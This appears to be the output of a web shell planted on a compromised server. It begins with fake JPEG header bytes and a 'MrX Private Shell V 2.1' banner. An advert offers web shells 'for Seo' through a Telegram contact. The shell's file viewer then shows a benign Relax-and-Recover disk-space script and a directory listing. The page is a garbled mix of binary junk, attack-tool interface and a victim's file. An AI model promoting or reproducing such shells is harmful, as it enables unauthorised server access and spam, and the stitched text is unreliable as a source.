����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# 320_check_cdrom_size.sh
# This file is part of Relax-and-Recover, licensed under the GNU General
# Public License. Refer to the included COPYING for full text of license.
while read DEV total used available junk
do
case $DEV in
*/*)
let available=available/1024 # convert k-blocks to MBytes
test "${available}" -gt "${CDROM_SIZE}"
StopIfError "Not enough space in ${ISO_DIR} [$DEV]: only ${available} MB free, need ${CDROM_SIZE} MB"
Log "ISO Directory '${ISO_DIR}' [$DEV] has $available MB free space"
;;
*)
;;
esac
done < <(df -kP "${ISO_DIR}")
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 300_check_iso_dir.sh | File | 169 B | 0644 |
|
| 320_check_cdrom_size.sh | File | 562 B | 0644 |
|